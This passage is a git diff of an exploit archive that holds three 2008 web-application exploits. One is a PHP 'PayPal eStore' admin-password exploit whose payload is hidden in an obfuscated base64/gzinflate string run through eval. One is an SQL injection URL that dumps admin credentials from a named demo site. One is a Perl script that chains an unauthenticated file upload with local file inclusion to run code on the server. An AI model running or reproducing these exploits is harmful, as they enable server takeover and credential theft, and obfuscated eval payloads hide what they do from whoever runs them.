"O08Z957kUfZ9DOiJRkjenh2IT5KwIubomdwxAryf9i7Uzu2M1dN59CKHYJtVh/zqGck2XO/P0S43". + "IwM4zboT8yBhHftSReTgPwHPmb5sRRW7xu+gm3WrxXyyWtjdejfn0BKXkCdQk6N61U0aT9VIkJ1y". + "7M1PJnCJsLChxq6aldzbsQi46RmPObpOxN/YdZr+jMDD+fDthzPG3THyPbEJ6LmZ1/OL+lVi+ZAn". + "p4GTsBDjLfUR5JeTfZSxUxzAF2r5gF26h2fwab3vJkk/N6d6TZJ1Z/0v4E45koC/SFZDePOMbu+g". + "bqx6H/cx4VkMPYOhcY8PRu1zp5qA3K/yU3/Iodu+6G0b2IO0LihmFayZk4MG8YUqtLCbl92pxEkU". + "axA/oSKn+y5/xv2ZdJTc6if6FXJxDPESkwK4j7uMsCLQ86OznkxitBhrcG6wAeyLsE8ckBpSXKKQ". + "Bz77Pq+p/XTysWZBXbPKMJ0koAvYbwHOk+c31wEMZ0c08sXrnuNJWgG+Zeh5GynYOJDmE6LCOuNZ". + "6pq/nW0NZ2FHtuc/bJNs8uq3B1zUT2/xgV2T6kZ1qSkXgHfBC8tE1GYbYrs/x+vEjp5NY3rel0zO". + "FJdBb/QLJdkzPoQdPRsDv8SQ07HPVdWYryXs8YBHC+/kArtCcTenfPGgrkHt11O2gDxiSBe9+xyw". + "EHBhVJCP93LLNZcXSIppfSgBkw7e0ZihZ8WX0DVS0PGCD04VqFnysr36cp643SmkNt16MisHHvLB". + "JzfbN0p/HkvP3SvKgwD3DrsWAX7a3PUf6dB/OFmPiyT0fKo/O158lrkrHJ6ewxLe4CkvonsEgtqB". + "kgnweHFjs1bwyANovUEDzu8xBj7cUS5O/dz3Q43vToGjHK/z6P8JoKtPdT4Cbs06mdUPa9zxXaiV". + "d+N3HCtnzqgY9gSdxk4i/oysC+C9+5wD//ZOIL7B5rE/Ygkqej89BbRGQX1Di7iBPIUYiuvAXT6P". + "/ntC9Gz/cqL+u/2nsdSmaEmYXSrqo/8usI+c3znV+33kFAl6fttCzYb+CPbk6HNsCdALriIdembC". + "g2wJ+vtFy24gV0EnN3TbM9Qh4KLAjYHDbZL5GepgpAOnGGLnm3VdXIWecXyBvRCpUA/d9oK34jP0". + "cbRORNoSb+yMeabn1/8H"; + eval(base64_decode(gzinflate(base64_decode($G4N0K)))); +?> + +# milw0rm.com [2008-12-07] 
diff --git a/platforms/php/webapps/7367.php b/platforms/php/webapps/7367.php
index 4d6331acb..a1be0d757 100755
--- a/platforms/php/webapps/7367.php
+++ b/platforms/php/webapps/7367.php
@@ -1,104 +1,104 @@ -<?php -/* -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - PayPal eStore Admin Password Changing Exploit -============================================================================== - - [»] Script: [ PayPal eStore ] - [»] Language: [ PHP ] - [»] homepage: [ http://www.webberco.com/ ] - [»] Type: [ Commercial ] - [»] found-report: [ 26.11.2008-02.12.2008 ] - [»] Founder.coder: [ G4N0K <mail.ganok[at]gmail.com> ] - -===[ LIVE ]=== - - [»] removed... - - - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 <Tornado2800[at]gmail.com> - [»] B13 - [»] AFSHIN-ZARBAT <afshin.zarbat[at]yahoo.com> - [»] QU1E <evilinhell87[at]yahoo.com> - [»] Hussain-X <darkangel_g85[at]yahoo.com> - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... -*/ - -error_reporting(E_ALL); - $G4N0K = "vVlJl6LKEv5BtXgMWiWLtwAUSApRkTF3DFXMymkVxF9/IxO0tOp19T39+vQiD5JkRsYcX6TYM/dR". - "L87W8zNyF+xyvtnPkGOtN6yFnYWThpp1jGRp4zr6cussU5QzrcHGl00/ay3FWiAlo/vQfHFaypIT". - "18op5iom9IRT4HWtwbgrlIs50GHi+b41+IRP+im/7KdtXMetq6D2Tc2YyOvOBmM5lixM6JnzxTHR". - "9CzamU2iVm1UKwejthgsoyfC48jXJPLOp/jC/JT+0i6nq+1I87pXdTM8n5hycT5i38oQnJ9oIvxW". - "2NAPBFSabbSzqmi3Obpa1eEtSgNOOCWqe0rmTA7PSSIL+0RlD6teKkJV6WPOZdau61g5MwF523XK". - "vK41C3g/V+tKyt5cKQN+K4e3gC8n3XjWMfQmqaMql5hPYG6Tbrgsi+qkieo4tfysi1ShSWRphhYx". - "YxeSsZYFJvStA7Yp75dEqw54KzFvvlSttzqD/YwxOPMS90TOJo84a/rWMa+yh1siC64VOPM8XVVW". 
- "FqrCMdh2KSrPbMBVZbCVNGI7rDq5IYu5rblF6IFuFBNssExdb9qADkrQxQEpuIprC3hdHNBC6UMP". - "bCNLCHtnDvQJ62Beo/uOoBf4HryA3vWgVoqQS/qId09YZouIO7dxsS82jDknY3XHK/jQM7b3k1jb". - "wN5GgP2mDDrFdVVFqnWBc0aaQo9Vt1/twGZqVaK50r3JYmEt3AV4k0Jovm/u923SSHV32JuWSDsA". - "zaqOuClj+EkVesk+mRO9nUuybzi3qUPPPWDNrMAWbCR36SOt6pGPQnxBKpvFxI7FvgP/6ALPKkNv". - "uhu+nZuYB/l4axqpznNUCydsAx87xpRr3IAOS+JLZN1gO/OAPaVf1XqbqCk9C868JDI72N9uTsB/". - "RXXnSxlWLeI/z0tb6t7mI930UX7gpUtG/eH63Ab+5hl0Uifz/8lHFtTugfLiJw3WrP2qWDBLTZqM". - "9jpEnMKs6nOFdxtKc4gPNgM+d1HR9INeqa5vujB8vcFcxqwK84PPfFomufTy4Cfzhg/VisH28Rj4". - "+g5i5jnwXSa6HPOI10vso2d0CTizgJGL51hL05gTDqG3eUnAr0Fnz+ZF7GD+hfgBxNCoNxJDXXuX". - "C2i80LgFHQIfRURiE3IL1oL8bn7cf80DNzkL8CmIQfSCisks1vSK7rEZ4W8M0HuKZPGnw+/H38rs". - "6xwd0vvD/N26TwPsJH5z1iz1B3ozpHXDHDzf79YYvRR/zN+t+zxE5vUbmVrCo/+JPqV3z8t4Fpn3". - "+Uc+7sd3+gN+3312OIvSYYX3Qb4znR94Ed6Hs8j50vD9O/0tqhVSLGRtpdXGYRW0EFQkC+8G1T3Q". - "Hc+BMZ4Dv4F/g5211EaKEJP5q1y/ob8/On7lf39wQKz+nZhab36hP2Jzan9q7/f7OBpiS7r6B32/". - "/v4N/Q3+xQ/xcvVxeMZX3yc+ipRujIVZavTib8Xv+73/amfqe6NPx9dY/XiKOxJjP+X7W/8b4uf9". - "GkfU74WB7k2Oa8yS8ydjXvk3+pOUN02CulQxaKFPCe/X+KEyknOuT4XwQOMJeABZCE80/sTfzH9/". - "cIh/s340m8CvNoDZU+yaDNTWCrBdGXnVCSlSFvMmT+otWpj7AOo3qeFo4U5i9dyG/uavxiTU8A4w". - "9BM8S8DrBOvSHoTgEX2B107JCGjezdYLQEMfdXus00wecC7B8j3UaVL3a5DrCHiVefPOBEfzgHuZ". - "cL5nzQFD5UhVCtqDwN633np3GHfrlu7W65PNVpHI+9LKk+Qd+oTIcxnA1iXQ6SLeZOgZgP8Bh6TY". - "T58hx18CXm8A17YEK63VD6xF8IJsnwHvJVVUb57WKnrS62ke8+IL1IkJ0sQUeogWqWWayPgU7Mxu". - "denaAPCGwQH+4ghemsyCHUqNC5yblrPE64DOuVkX50Pg6RXsB3mRgHaAy11Bs8tDvi6zFjDpM+hz". - "WDMf9g44cZOOWFVAgEEB91eA2dOlT/gZMbdM0NfyhreWdkzxFsqlBpN+CbCezySrbQ/6gR6EYqe7". - "uYT0WDc8Be/Q6yUenJcjYuNDaA/8RGpJZKF4FKkYegcmj1WhT5RRjnzUCSu18e7PyWPOr35QjXbV". - "mc/y3POBNGsaE/rQQ75pG3jHWaS54FtospT/jUwKE36VifjQn5Pp8ihT4Fv7rzJ98PGNTC0a/K+5". - "+i/IBnIpOSa5BPoioH9KeInHn2ViplXSs5B3zEvCQf803xM6VBcjrSbaSSz0XTfMfeuzHrF+ikgH". - "cDleY5en/QnIAt9AJ1M+1pLys3zRLukSznq3mKkBvvrQR8M7F3hnlqyj8vHAE/QLg730HureE41f". 
- "WfjoDz9i7yEGrzYaeEnaz3xgTvjMwyXx9CPk1Ts961LAQ2/HTTKaUz7T3ekVySFfbFi7pFf+TL/H". - "Puln72KtGvYTWW+8g7zEfpFN7As5dMiXeUzuN67PlObjax5WrZL0+k2Dc3Efgl2h39zrirCxWdOB". - "fLmLWOoDO39bpnoepF/X6GxcVwO/FdMgOaiRrFSRD7xv09JnpbXDWtF9/vqG1p1f68nrVqz1XMyw". - "x3aJVn6zrkwhz3eQE9P1Vszt2uXH+xohGJ41maN3N5cF5KnJB18PvqYnRo7u1qJfriX0XF8qgZ9K". - "t1HngE2g9pwwv8xXvVVAv3oKuKwNe1EgNSuGvjvK0zKG36/2oQxr4QfewjdZp7IhGZ1+JqeR6xlW". - "2SbKBeIjDKnpcT/tQk38T6QKO+i/AT9ljquI7XI7OfuaHkdjrfhE995mJ1Sde1+duuTux3AUctfC". - "rHLJjPimiSDXGRfntJTFvcuBXKrAx5dD6towru+9tHJlkTWKxQsCeQ3XtVe91CfF/mwUZYMWSRVw". - "x9a4oG45TzvTRtPlPEituuqxh9s3eXYxCimOq/Npy7lVLLMS5EAO25ATL2I3yAF5sZ5WY0w9I/VY". - "YV88Qsw3Se3SvZvrnZ/MOiRuQIYsBlwZemZG8UAuTAyf3DeyFEMYvttH1D5CiT3rM40l6GFHci/V". - "nWru4R3sKfwAO9C1lK8cvehq04ackxoFk+oa5D55kt++aRCnxPYyIv6QJZqVBdwB/FSqIRcWISd0". - "2Jv8LJ4O977wUcfAF2SoGTv9FPVdqkN+jXfgW3mXmrbYrLiqfpUXxCeZwDN/vPrHivjgq4w+8l0x". - "5UOoF4CVeryVpsFWKiNiz35yMvJFes2ZDu8eEzWjd5wJwWGyxMfkDuy6Thby9eccQ/IQ2G+do2YF". - "uDTRQM/FUcD07jrNH+9l2BjV9A6R3K31kacc0Dzr4BzgPWsjb/ECda3EJKZ6FrAWZlaFQ/GKD7XZ". - "648Jmp8BE938o8Iy8EZ5mT1R/qrDD38rEpltco9IsTCxiw++xm9ADppDKd+AzfJX+1gngPkS1dnr". - "oKME8GTYd2OsllCTQR/wDXm4irjgbk3ZQB6CXL08rT28gxi9vMo3m4Mu2Dogd6jcPd3yJfSC9JXm". - "hgp0gvaDz0DvszPZgDOBR7NOvPPhbYuaqy0hX0SvLAMyTT7unlUXcMMnm9xkn8ygNhD7jfe4oHeo". - "QVjp8vXurl9Qh34Be4NeDI7iH3rn+pXmdIX9OI3v7sRDf5lCrc+NHHD3QrBd5fBYt0m+GfR88zFi". - "Q4KdwReH/kUD7A+YYnVbt0hD0AkmPNf07v/Z6GcPZ3zgU5InP+bvMZG/neRjPWiJ74z/I/zftEA/". - "2dcY+NfPC9A93foZt8upnebNieQo0t+tNIkBPDf8B2AfH+7hVyzYr7z1delmV6bWxVotF4fBfrzZ". - "Bd7khoFuzxEDIIhLyNkH8EmoodIX37IhP0H+OkBPfomBtgF97lpzniBWGaRgNlKnVVwrOcQDnOU8". 
- "kb7fyMUT+OHgO9+ci+szG3PpHupg+r6VqggwGdIO6ZAnxNIqha1tH8ld6X//AQ=="; - eval(base64_decode(gzinflate(base64_decode($G4N0K)))); -?> - -# milw0rm.com [2008-12-07] +<?php +/* +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + PayPal eStore Admin Password Changing Exploit +============================================================================== + + [»] Script: [ PayPal eStore ] + [»] Language: [ PHP ] + [»] homepage: [ http://www.webberco.com/ ] + [»] Type: [ Commercial ] + [»] found-report: [ 26.11.2008-02.12.2008 ] + [»] Founder.coder: [ G4N0K <mail.ganok[at]gmail.com> ] + +===[ LIVE ]=== + + [»] removed... + + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 <Tornado2800[at]gmail.com> + [»] B13 + [»] AFSHIN-ZARBAT <afshin.zarbat[at]yahoo.com> + [»] QU1E <evilinhell87[at]yahoo.com> + [»] Hussain-X <darkangel_g85[at]yahoo.com> + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... +*/ + +error_reporting(E_ALL); + $G4N0K = "vVlJl6LKEv5BtXgMWiWLtwAUSApRkTF3DFXMymkVxF9/IxO0tOp19T39+vQiD5JkRsYcX6TYM/dR". + "L87W8zNyF+xyvtnPkGOtN6yFnYWThpp1jGRp4zr6cussU5QzrcHGl00/ay3FWiAlo/vQfHFaypIT". + "18op5iom9IRT4HWtwbgrlIs50GHi+b41+IRP+im/7KdtXMetq6D2Tc2YyOvOBmM5lixM6JnzxTHR". + "9CzamU2iVm1UKwejthgsoyfC48jXJPLOp/jC/JT+0i6nq+1I87pXdTM8n5hycT5i38oQnJ9oIvxW". + "2NAPBFSabbSzqmi3Obpa1eEtSgNOOCWqe0rmTA7PSSIL+0RlD6teKkJV6WPOZdau61g5MwF523XK". 
+ "vK41C3g/V+tKyt5cKQN+K4e3gC8n3XjWMfQmqaMql5hPYG6Tbrgsi+qkieo4tfysi1ShSWRphhYx". + "YxeSsZYFJvStA7Yp75dEqw54KzFvvlSttzqD/YwxOPMS90TOJo84a/rWMa+yh1siC64VOPM8XVVW". + "FqrCMdh2KSrPbMBVZbCVNGI7rDq5IYu5rblF6IFuFBNssExdb9qADkrQxQEpuIprC3hdHNBC6UMP". + "bCNLCHtnDvQJ62Beo/uOoBf4HryA3vWgVoqQS/qId09YZouIO7dxsS82jDknY3XHK/jQM7b3k1jb". + "wN5GgP2mDDrFdVVFqnWBc0aaQo9Vt1/twGZqVaK50r3JYmEt3AV4k0Jovm/u923SSHV32JuWSDsA". + "zaqOuClj+EkVesk+mRO9nUuybzi3qUPPPWDNrMAWbCR36SOt6pGPQnxBKpvFxI7FvgP/6ALPKkNv". + "uhu+nZuYB/l4axqpznNUCydsAx87xpRr3IAOS+JLZN1gO/OAPaVf1XqbqCk9C868JDI72N9uTsB/". + "RXXnSxlWLeI/z0tb6t7mI930UX7gpUtG/eH63Ab+5hl0Uifz/8lHFtTugfLiJw3WrP2qWDBLTZqM". + "9jpEnMKs6nOFdxtKc4gPNgM+d1HR9INeqa5vujB8vcFcxqwK84PPfFomufTy4Cfzhg/VisH28Rj4". + "+g5i5jnwXSa6HPOI10vso2d0CTizgJGL51hL05gTDqG3eUnAr0Fnz+ZF7GD+hfgBxNCoNxJDXXuX". + "C2i80LgFHQIfRURiE3IL1oL8bn7cf80DNzkL8CmIQfSCisks1vSK7rEZ4W8M0HuKZPGnw+/H38rs". + "6xwd0vvD/N26TwPsJH5z1iz1B3ozpHXDHDzf79YYvRR/zN+t+zxE5vUbmVrCo/+JPqV3z8t4Fpn3". + "+Uc+7sd3+gN+3312OIvSYYX3Qb4znR94Ed6Hs8j50vD9O/0tqhVSLGRtpdXGYRW0EFQkC+8G1T3Q". + "Hc+BMZ4Dv4F/g5211EaKEJP5q1y/ob8/On7lf39wQKz+nZhab36hP2Jzan9q7/f7OBpiS7r6B32/". + "/v4N/Q3+xQ/xcvVxeMZX3yc+ipRujIVZavTib8Xv+73/amfqe6NPx9dY/XiKOxJjP+X7W/8b4uf9". + "GkfU74WB7k2Oa8yS8ydjXvk3+pOUN02CulQxaKFPCe/X+KEyknOuT4XwQOMJeABZCE80/sTfzH9/". + "cIh/s340m8CvNoDZU+yaDNTWCrBdGXnVCSlSFvMmT+otWpj7AOo3qeFo4U5i9dyG/uavxiTU8A4w". + "9BM8S8DrBOvSHoTgEX2B107JCGjezdYLQEMfdXus00wecC7B8j3UaVL3a5DrCHiVefPOBEfzgHuZ". + "cL5nzQFD5UhVCtqDwN633np3GHfrlu7W65PNVpHI+9LKk+Qd+oTIcxnA1iXQ6SLeZOgZgP8Bh6TY". + "T58hx18CXm8A17YEK63VD6xF8IJsnwHvJVVUb57WKnrS62ke8+IL1IkJ0sQUeogWqWWayPgU7Mxu". + "denaAPCGwQH+4ghemsyCHUqNC5yblrPE64DOuVkX50Pg6RXsB3mRgHaAy11Bs8tDvi6zFjDpM+hz". + "WDMf9g44cZOOWFVAgEEB91eA2dOlT/gZMbdM0NfyhreWdkzxFsqlBpN+CbCezySrbQ/6gR6EYqe7". + "uYT0WDc8Be/Q6yUenJcjYuNDaA/8RGpJZKF4FKkYegcmj1WhT5RRjnzUCSu18e7PyWPOr35QjXbV". + "mc/y3POBNGsaE/rQQ75pG3jHWaS54FtospT/jUwKE36VifjQn5Pp8ihT4Fv7rzJ98PGNTC0a/K+5". 
+ "+i/IBnIpOSa5BPoioH9KeInHn2ViplXSs5B3zEvCQf803xM6VBcjrSbaSSz0XTfMfeuzHrF+ikgH". + "cDleY5en/QnIAt9AJ1M+1pLys3zRLukSznq3mKkBvvrQR8M7F3hnlqyj8vHAE/QLg730HureE41f". + "WfjoDz9i7yEGrzYaeEnaz3xgTvjMwyXx9CPk1Ts961LAQ2/HTTKaUz7T3ekVySFfbFi7pFf+TL/H". + "Puln72KtGvYTWW+8g7zEfpFN7As5dMiXeUzuN67PlObjax5WrZL0+k2Dc3Efgl2h39zrirCxWdOB". + "fLmLWOoDO39bpnoepF/X6GxcVwO/FdMgOaiRrFSRD7xv09JnpbXDWtF9/vqG1p1f68nrVqz1XMyw". + "x3aJVn6zrkwhz3eQE9P1Vszt2uXH+xohGJ41maN3N5cF5KnJB18PvqYnRo7u1qJfriX0XF8qgZ9K". + "t1HngE2g9pwwv8xXvVVAv3oKuKwNe1EgNSuGvjvK0zKG36/2oQxr4QfewjdZp7IhGZ1+JqeR6xlW". + "2SbKBeIjDKnpcT/tQk38T6QKO+i/AT9ljquI7XI7OfuaHkdjrfhE995mJ1Sde1+duuTux3AUctfC". + "rHLJjPimiSDXGRfntJTFvcuBXKrAx5dD6towru+9tHJlkTWKxQsCeQ3XtVe91CfF/mwUZYMWSRVw". + "x9a4oG45TzvTRtPlPEituuqxh9s3eXYxCimOq/Npy7lVLLMS5EAO25ATL2I3yAF5sZ5WY0w9I/VY". + "YV88Qsw3Se3SvZvrnZ/MOiRuQIYsBlwZemZG8UAuTAyf3DeyFEMYvttH1D5CiT3rM40l6GFHci/V". + "nWru4R3sKfwAO9C1lK8cvehq04ackxoFk+oa5D55kt++aRCnxPYyIv6QJZqVBdwB/FSqIRcWISd0". + "2Jv8LJ4O977wUcfAF2SoGTv9FPVdqkN+jXfgW3mXmrbYrLiqfpUXxCeZwDN/vPrHivjgq4w+8l0x". + "5UOoF4CVeryVpsFWKiNiz35yMvJFes2ZDu8eEzWjd5wJwWGyxMfkDuy6Thby9eccQ/IQ2G+do2YF". + "uDTRQM/FUcD07jrNH+9l2BjV9A6R3K31kacc0Dzr4BzgPWsjb/ECda3EJKZ6FrAWZlaFQ/GKD7XZ". + "648Jmp8BE938o8Iy8EZ5mT1R/qrDD38rEpltco9IsTCxiw++xm9ADppDKd+AzfJX+1gngPkS1dnr". + "oKME8GTYd2OsllCTQR/wDXm4irjgbk3ZQB6CXL08rT28gxi9vMo3m4Mu2Dogd6jcPd3yJfSC9JXm". + "hgp0gvaDz0DvszPZgDOBR7NOvPPhbYuaqy0hX0SvLAMyTT7unlUXcMMnm9xkn8ygNhD7jfe4oHeo". + "QVjp8vXurl9Qh34Be4NeDI7iH3rn+pXmdIX9OI3v7sRDf5lCrc+NHHD3QrBd5fBYt0m+GfR88zFi". + "Q4KdwReH/kUD7A+YYnVbt0hD0AkmPNf07v/Z6GcPZ3zgU5InP+bvMZG/neRjPWiJ74z/I/zftEA/". + "2dcY+NfPC9A93foZt8upnebNieQo0t+tNIkBPDf8B2AfH+7hVyzYr7z1delmV6bWxVotF4fBfrzZ". + "Bd7khoFuzxEDIIhLyNkH8EmoodIX37IhP0H+OkBPfomBtgF97lpzniBWGaRgNlKnVVwrOcQDnOU8". + "kb7fyMUT+OHgO9+ci+szG3PpHupg+r6VqggwGdIO6ZAnxNIqha1tH8ld6X//AQ=="; + eval(base64_decode(gzinflate(base64_decode($G4N0K)))); +?> + +# milw0rm.com [2008-12-07] 
diff --git a/platforms/php/webapps/7368.txt b/platforms/php/webapps/7368.txt
index bc7a2b6ce..efafd2f15 100755
--- a/platforms/php/webapps/7368.txt
+++ b/platforms/php/webapps/7368.txt
@@ -1,52 +1,52 @@ - +++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++ - + + - + Product Sale Framework sql injection Vulnerability + - + + - + Discovered by b3hz4d + - + + - + WwW.DeltaHacking.Net + - + + - + + - + + - ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - - - APA Center of Yazd University - (https://www.ircert.cc) - - -AUTHOR : b3hz4d (Seyed Behzad Shaghasemi) -DATE : 06 Dec 2008 -SITE : WwW.DeltaHacking.Net -CONTACT: behzad_sh_66@yahoo.com - -##################################################### - -APPLICATION : Product Sale Framework v0.1 beta -DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip -VENDOR : http://www.productsaleframework.com -DEMO (links) : http://www.productsaleframework.com - -##################################################### - - -[+] vuln : - customer.forumtopic.php - - vulnerability is in froum.all demo link(Admin demo,Affiliate demo,Customer demo) is here: - - http://www.productsaleframework.com/ - -[+] Exploit : - Admin Username and Password: - - http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb - - -########################################################################################################## - -# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com # - -########################################################################################################## - -# milw0rm.com [2008-12-07] + +++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++ + + + + + Product Sale Framework sql injection Vulnerability + + + + + + Discovered by b3hz4d + + + + + + WwW.DeltaHacking.Net + + + + + + + + + + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + APA Center of Yazd University + (https://www.ircert.cc) + + +AUTHOR : b3hz4d (Seyed Behzad Shaghasemi) +DATE : 
06 Dec 2008 +SITE : WwW.DeltaHacking.Net +CONTACT: behzad_sh_66@yahoo.com + +##################################################### + +APPLICATION : Product Sale Framework v0.1 beta +DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip +VENDOR : http://www.productsaleframework.com +DEMO (links) : http://www.productsaleframework.com + +##################################################### + + +[+] vuln : + customer.forumtopic.php + + vulnerability is in froum.all demo link(Admin demo,Affiliate demo,Customer demo) is here: + + http://www.productsaleframework.com/ + +[+] Exploit : + Admin Username and Password: + + http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb + + +########################################################################################################## + +# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com # + +########################################################################################################## + +# milw0rm.com [2008-12-07] diff --git a/platforms/php/webapps/7369.pl b/platforms/php/webapps/7369.pl index 32561042c..9fe5dc40f 100755 --- a/platforms/php/webapps/7369.pl +++ b/platforms/php/webapps/7369.pl 
@@ -1,164 +1,164 @@ -#!/usr/bin/perl -use LWP::UserAgent; -use HTTP::Request::Common qw(POST); -use Getopt::Long; - -# \#'#/ -# (-.-) -# ------------------oOO---(_)---OOo----------------- -# | __ __ | -# | _____/ /_____ ______/ /_ __ ______ ______ | -# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ | -# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) | -# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ | -# | Security Research Division /____/ 2oo8 | -# -------------------------------------------------- -# | w3blabor v3.0.5 Arbitrary File Upload & LFI | -# -------------------------------------------------- -# [!] Discovered.: DNX -# [!] Vendor.....: http://www.w3blaborcms.de -# [!] Detected...: 17.10.2008 -# [!] Reported...: 29.11.2008 -# [!] Response...: xx.xx.2008 -# -# [!] Background.: Sicher! Schnell! Einfach! -# Das CMS wurde durch diverse Abfragen und Konfigurationen gegen Hackangriffe -# abgesichert. Auch arbeitet es sehr stabil und kommuniziert schnell mit der -# angebundenen Datenbank. Die Verwaltung gestaltet sich als besonders einfach im -# Gegensatz zu vielen anderen Content Management Systemen - Und genau das macht -# es zu etwas Besonderem! -# -# [!] Bug Upload.: in admin/inc/media.inc.php near line 71 (no check on admin privileges) -# -# 71: if (isset($_GET['action']) && $_GET['action'] == "upload") { -# -# 80: $dir = "../../includes/media"; -# 81: $file = $_FILES['datei']['name']; -# -# 92: $file = strtolower($file); -# 93: -# 94: move_uploaded_file($_FILES['datei']['tmp_name'],$dir."/".$file); -# 95: @chmod("".$dir.""/"".$file."", 0777); -# -# [!] 
Bug Upload.: in admin/inc/meinlogo.inc.php near line 45 (no check on admin privileges) -# -# 45: $neueslogo = $_FILES['neueslogo']['name']; -# 46: $logopfad = "../../includes/upload/".$settings['page_logo'].""; -# 47: -# 48: $endung = substr ($_FILES['neueslogo']['name'], -3); -# 49: -# 50: if (($endung=="jpg") || ($endung=="peg") || ($endung=="png") || ($endung=="gif") || ($endung=="JPG") || ($endung=="PEG") || ($endung=="PNG") || ($endung=="GIF")) { -# -# 54: move_uploaded_file($_FILES['neueslogo']['tmp_name'],"../../includes/upload/".$neueslogo); -# -# [!] Bug LFI....: $_GET['modul'] in admin/inc/modul.inc.php near line 47 (requires magic_quotes_gpc = Off) -# -# 43: $modulfile = "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php"; -# 44: -# 45: if (file_exists($modulfile)) { -# 46: -# 47: include "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php"; -# -# [!] Solution...: no update from vendor till now -# - -if(!$ARGV[4]) -{ - print "\n \\#'#/ "; - print "\n (-.-) "; - print "\n ----------------oOO---(_)---OOo----------------"; - print "\n | w3blabor v3.0.5 Arbitrary File Upload & LFI |"; - print "\n | coded by DNX |"; - print "\n -----------------------------------------------"; - print "\n[!] Usage: perl w3blabor.pl [Host] [Path] <Options>"; - print "\n[!] Example: perl w3blabor.pl 127.0.0.1 /w3blabor/ -2 -f s.jpg"; - print "\n[!] Targets:"; - print "\n -1 Upload over media.inc.php"; - print "\n -2 Upload over meinlogo.inc.php"; - print "\n[!] Options:"; - print "\n[!] -f [filename] Path to local file with php code"; - print "\n -p [ip:port] Proxy support"; - print "\n"; - exit; -} - -my $host = $ARGV[0]; -my $path = $ARGV[1]; -my $file = ""; -my %options = (); -GetOptions(\%options, "1", "2", "f=s", "p=s"); - -if($options{"f"}) -{ - $file = $options{"f"}; - if(!-e $file) - { - print "[!] Failed, local file doesn't exist.\n"; - exit; - } -} -else -{ - print "[!] Failed, see usage.\n"; - exit; -} - -print "[!] 
Exploiting...\n"; - -use_bug($host, $path, $file); - -print "[!] Exploit done\n"; - -sub use_bug -{ - my $host = shift; - my $path = shift; - my $file = shift; - - my $ua = LWP::UserAgent->new(); - my $url = ""; - my $url2 = ""; - my $req = ""; - $file =~ /.*[\/|\\](.*)/; - my $filename = $1; - - if($options{"p"}) - { - $ua->proxy('http', "http://".$options{"p"}); - } - - if($options{"1"}) - { - $url = 'http://'.$host.$path.'admin/inc/media.inc.php?action=upload'; - $url2 = 'http://'.$host.$path.'includes/media/'.$filename; - $req = POST $url, Content_Type => 'form-data', Content => [ datei => [$file], ]; - } - if($options{"2"}) - { - if($file =~ m/.*\.jpg|peg|png|gif/i) - { - $url = 'http://'.$host.$path.'admin/inc/meinlogo.inc.php?action=upload'; - $url2 = 'http://'.$host.$path.'admin/inc/modul.inc.php?modul=../upload/'.$filename.'%00'; - $req = POST $url, Content_Type => 'form-data', Content => [ neueslogo => [$file], ]; - } - else - { - print "[!] Failed, rename your local file to .jpg\n"; - exit; - } - } - - $ua->request($req); - my $res = $ua->get($url2); - if($res->is_success) - { - print "[!] File uploaded\n"; - print "[!] Check your file @ ".$url2."\n"; - } - else - { - print "[!] Failed\n"; - } -} - -# milw0rm.com [2008-12-07] +#!/usr/bin/perl +use LWP::UserAgent; +use HTTP::Request::Common qw(POST); +use Getopt::Long; + +# \#'#/ +# (-.-) +# ------------------oOO---(_)---OOo----------------- +# | __ __ | +# | _____/ /_____ ______/ /_ __ ______ ______ | +# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ | +# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) | +# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ | +# | Security Research Division /____/ 2oo8 | +# -------------------------------------------------- +# | w3blabor v3.0.5 Arbitrary File Upload & LFI | +# -------------------------------------------------- +# [!] Discovered.: DNX +# [!] Vendor.....: http://www.w3blaborcms.de +# [!] Detected...: 17.10.2008 +# [!] Reported...: 29.11.2008 +# [!] 
